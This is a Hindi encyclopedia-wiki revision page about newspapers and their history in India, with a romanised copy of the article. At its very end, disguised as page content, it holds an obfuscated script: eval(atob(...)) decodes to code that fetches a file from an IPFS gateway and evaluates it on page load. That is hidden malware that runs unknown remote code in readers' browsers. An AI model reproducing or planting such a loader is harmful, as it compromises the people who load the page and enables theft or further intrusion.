Difference between revisions of "समाचार पत्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
'''समाचार पत्र''' अथवा '''अख़बार''' ([[अंग्रेज़ी]]:Newspaper) समाज और देश में हो रही घटनाओं पर आधारित एक प्रकाशन है। इसमें मुख्यत: ताजी घटनाएँ, खेल-कूद, व्यक्तित्व, राजनीति, विज्ञापन की जानकारियाँ सस्ते [[काग़ज़]] पर छपी होती है। समाचार पत्र संचार के साधनों में महत्त्वपूर्ण स्थान रखते हैं। ये काग़ज़ पर शब्दों से बने वाक्यों को लिखकर या छापकर तैयार होते  हैं। समाचार पत्र प्रायः दैनिक होते हैं लेकिन कुछ समाचार पत्र साप्ताहिक, मासिक एवं छमाही भी होते हैं। अधिकतर समाचारपत्र स्थानीय भाषाओं में और स्थानीय विषयों पर केन्द्रित होते हैं।
 
'''समाचार पत्र''' अथवा '''अख़बार''' ([[अंग्रेज़ी]]:Newspaper) समाज और देश में हो रही घटनाओं पर आधारित एक प्रकाशन है। इसमें मुख्यत: ताजी घटनाएँ, खेल-कूद, व्यक्तित्व, राजनीति, विज्ञापन की जानकारियाँ सस्ते [[काग़ज़]] पर छपी होती है। समाचार पत्र संचार के साधनों में महत्त्वपूर्ण स्थान रखते हैं। ये काग़ज़ पर शब्दों से बने वाक्यों को लिखकर या छापकर तैयार होते  हैं। समाचार पत्र प्रायः दैनिक होते हैं लेकिन कुछ समाचार पत्र साप्ताहिक, मासिक एवं छमाही भी होते हैं। अधिकतर समाचारपत्र स्थानीय भाषाओं में और स्थानीय विषयों पर केन्द्रित होते हैं।
==समाचार पत्रों का इतिहास==
+
==इतिहास और योगदान==
 +
भारत में ब्रिटिश शासन के एक पूर्व अधिकारी के द्वारा अखबारों की शुरुआत मानी जाती है, लेकिन उसका स्वरूप अखबारों की तरह नहीं था। वह केवल एक पन्ने का सूचनात्मक पर्चा था। पूर्णरूपेण अखबार बंगाल से 'बंगाल गजट' के नाम से वायसराय हिक्की द्वारा निकाला गया था। आरंभ में [[अंग्रेज़|अंग्रेजों]] ने अपने फायदे के लिए अखबारों का इस्तेमाल किया, चूँकि सारे अखबार अंग्रेज़ी में ही निकल रहे थे, इसलिए बहुसंख्यक लोगों तक खबरें और सूचनाएँ पहुँच नहीं पाती थीं। जो खबरें बाहर निकलकर आती थीं। उन्हें काफी तोड़-मरोड़कर प्रस्तुत किया जाता था, ताकि अंग्रेज़ी सरकार के अत्याचारों की खबरें दबी रह जाएँ। अंग्रेज़ सिपाही किसी भी क्षेत्र में घुसकर मनमाना व्यवहार करते थे। वो जिस भी क्षेत्र से गुजरते, वहाँ अपना आतंक फैलाते रहते थे। उनके खिलाफ न तो मुकदमे होते और न ही उन्हें कोई दंड ही दिया जाता था। इन नारकीय परिस्थितियों को झेलते हुए भी लोग खामोश थे। इस दौरान भारत में ‘द हिंदुस्तान टाइम्स’, ‘नेशनल हेराल्ड', 'पायनियर', 'मुंबई-मिरर' जैसे अखबार अंग्रेज़ी में निकलते थे, जिसमें उन अत्याचारों का दूर-दूर तक उल्लेख नहीं रहता था। इन अंग्रेज़ी पत्रों के अतिरिक्त [[बंगला भाषा|बंगला]], [[उर्दू भाषा|उर्दू]] आदि में पत्रों का प्रकाशन तो होता रहा, लेकिन उसका दायरा सीमित था। उसे कोई बंगाली पढ़ने वाला या उर्दू जानने वाला ही समझ सकता था। ऐसे में पहली बार 30 मई, 1826 को [[हिन्दी]] का प्रथम पत्र ‘उदंत मार्तंड’ का पहला अंक प्रकाशित हुआ।<ref>{{cite web |url=http://hindi.webdunia.com/miscellaneous/special07/idday/0708/12/1070812061_1.htm |title=जब अखबार बने आजादी का हथियार |accessmonthday=1 सितम्बर |accessyear=2012 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=वेब दुनिया हिन्दी |language=हिन्दी }} </ref>
 +
==भारत में समाचार पत्रों का इतिहास==
 
{{Main|भारत में समाचार पत्रों का इतिहास}}
 
{{Main|भारत में समाचार पत्रों का इतिहास}}
 
[[भारत]] में समाचार पत्रों का इतिहास यूरोपीय लोगों के भारत में प्रवेश के साथ ही प्रारम्भ होता है। सर्वप्रथम भारत में प्रिंटिग प्रेस लाने का श्रेय [[पुर्तग़ाली|पुर्तग़ालियों]] को दिया जाता है। 1557 ई. में [[गोवा]] के कुछ पादरी लोगों ने भारत की पहली पुस्तक छापी। 1684 ई. में [[अंग्रेज़]] [[ईस्ट इण्डिया कम्पनी]] ने भी भारत की पहली पुस्तक की छपाई की थी। 1684 ई. में ही कम्पनी ने भारत में प्रथम प्रिंटिग प्रेस (मुद्रणालय) की स्थापना की।  
 
[[भारत]] में समाचार पत्रों का इतिहास यूरोपीय लोगों के भारत में प्रवेश के साथ ही प्रारम्भ होता है। सर्वप्रथम भारत में प्रिंटिग प्रेस लाने का श्रेय [[पुर्तग़ाली|पुर्तग़ालियों]] को दिया जाता है। 1557 ई. में [[गोवा]] के कुछ पादरी लोगों ने भारत की पहली पुस्तक छापी। 1684 ई. में [[अंग्रेज़]] [[ईस्ट इण्डिया कम्पनी]] ने भी भारत की पहली पुस्तक की छपाई की थी। 1684 ई. में ही कम्पनी ने भारत में प्रथम प्रिंटिग प्रेस (मुद्रणालय) की स्थापना की।  
Line 22: Line 24:
 
* [[युवा शक्ति विचार]]
 
* [[युवा शक्ति विचार]]
 
* [[देशबन्धु]]
 
* [[देशबन्धु]]
 
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
*[http://www.wan-press.org/article2821.html Newspapers: A Brief History]
 
*[http://www.wan-press.org/article2821.html Newspapers: A Brief History]

Revision as of 12:30, 1 September 2012

samachar patr athava akhabar (aangrezi:Newspaper) samaj aur desh mean ho rahi ghatanaoan par adharit ek prakashan hai. isamean mukhyat: taji ghatanaean, khel-kood, vyaktitv, rajaniti, vijnapan ki janakariyaan saste kagaz par chhapi hoti hai. samachar patr sanchar ke sadhanoan mean mahattvapoorn sthan rakhate haian. ye kagaz par shabdoan se bane vakyoan ko likhakar ya chhapakar taiyar hote haian. samachar patr prayah dainik hote haian lekin kuchh samachar patr saptahik, masik evan chhamahi bhi hote haian. adhikatar samacharapatr sthaniy bhashaoan mean aur sthaniy vishayoan par kendrit hote haian.

itihas aur yogadan

bharat mean british shasan ke ek poorv adhikari ke dvara akhabaroan ki shuruat mani jati hai, lekin usaka svaroop akhabaroan ki tarah nahian tha. vah keval ek panne ka soochanatmak parcha tha. poornaroopen akhabar bangal se 'bangal gajat' ke nam se vayasaray hikki dvara nikala gaya tha. aranbh mean aangrejoan ne apane phayade ke lie akhabaroan ka istemal kiya, chooanki sare akhabar aangrezi mean hi nikal rahe the, isalie bahusankhyak logoan tak khabarean aur soochanaean pahuanch nahian pati thian. jo khabarean bahar nikalakar ati thian. unhean kaphi to d-maro dakar prastut kiya jata tha, taki aangrezi sarakar ke atyacharoan ki khabarean dabi rah jaean. aangrez sipahi kisi bhi kshetr mean ghusakar manamana vyavahar karate the. vo jis bhi kshetr se gujarate, vahaan apana atank phailate rahate the. unake khilaph n to mukadame hote aur n hi unhean koee dand hi diya jata tha. in narakiy paristhitiyoan ko jhelate hue bhi log khamosh the. is dauran bharat mean ‘d hiandustan taims’, ‘neshanal herald', 'payaniyar', 'muanbee-mirar' jaise akhabar aangrezi mean nikalate the, jisamean un atyacharoan ka door-door tak ullekh nahian rahata tha. in aangrezi patroan ke atirikt bangala, urdoo adi mean patroan ka prakashan to hota raha, lekin usaka dayara simit tha. use koee bangali padhane vala ya urdoo janane vala hi samajh sakata tha. aise mean pahali bar 30 mee, 1826 ko hindi ka pratham patr ‘udant martand’ ka pahala aank prakashit hua.[1]

bharat mean samachar patroan ka itihas

  1. REDIRECTsaancha:mukhy

bharat mean samachar patroan ka itihas yooropiy logoan ke bharat mean pravesh ke sath hi prarambh hota hai. sarvapratham bharat mean priantig pres lane ka shrey purtagaliyoan ko diya jata hai. 1557 ee. mean gova ke kuchh padari logoan ne bharat ki pahali pustak chhapi. 1684 ee. mean aangrez eest indiya kampani ne bhi bharat ki pahali pustak ki chhapaee ki thi. 1684 ee. mean hi kampani ne bharat mean pratham priantig pres (mudranalay) ki sthapana ki.

vishesh bindu

  • pahala bharatiy aangrezi samachar patr 1816 ee. mean kalakatta mean gangadhar bhattachary dvara 'bangal gajat' nam se nikala gaya. yah saptahik samachar patr tha.
  • 1818 ee. mean marshamain ke netritv mean bangali bhasha mean 'digdarshan' masik patr prakashit hua, lekin yah patr alpakalik siddh hua. isi samay marshamain ke sanpadan mean ek aur saptahik samachar patr 'samachar darpan' prakashit kiya gaya.
  • 1821 ee. mean bangali bhasha mean saptahik samachar patr 'sanvad kaumudi' ka prakashan hua. is samachar patr ka prabandh raja ramamohan ray ke hathoan mean tha.
  • bharat ka pratham hindi samachar patr 'udant martand' tha.

hindi samachar patr


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. jab akhabar bane ajadi ka hathiyar (hindi) (ech.ti.em.el) veb duniya hindi. abhigaman tithi: 1 sitambar, 2012.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>